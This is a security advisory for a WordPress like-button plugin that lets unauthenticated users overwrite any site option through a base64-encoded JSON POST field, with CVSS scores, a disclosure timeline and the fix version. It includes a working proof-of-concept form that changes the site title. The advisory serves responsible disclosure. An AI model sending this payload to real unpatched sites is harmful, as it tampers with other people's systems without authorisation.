Like Button Rating ♥ LikeBtn allows anybody to set any option

Vulnerability

Last revised: April 10, 2018

In the init action, this plugin checks to see if $_POST['likebtn_import_config'] is empty. If it’s not empty then it base64-decodes the string, parses it as JSON, and starts changing options.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score	6.4 Medium
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

The below form will set the “Site Title” option to “Temmie”:

<form method="POST" action="http://localhost/">
 <input type="text" name="likebtn_import_config" value="ewogICJsaWtlYnRuX3NldHRpbmdzX29wdGlvbnMiOiB7CiAgICAiYmxvZ25hbWUiOiAiVGVtbWllIgogIH0KfQo=">
 <input type="submit">
</form>

This works whether you’re logged in or not. The base64-encoded JSON above is this:

{
  "likebtn_settings_options": {
    "blogname": "Temmie"
  }
}

Advisory timeline

2017-10-27: Discovered
2017-11-02: Reported to vendor via email
2017-11-02: Vendor reported fixed
2018-04-10: Advisory published

Mitigation/further actions

Upgrade to version 2.5.4 or later.

dxw advisories

Advisory: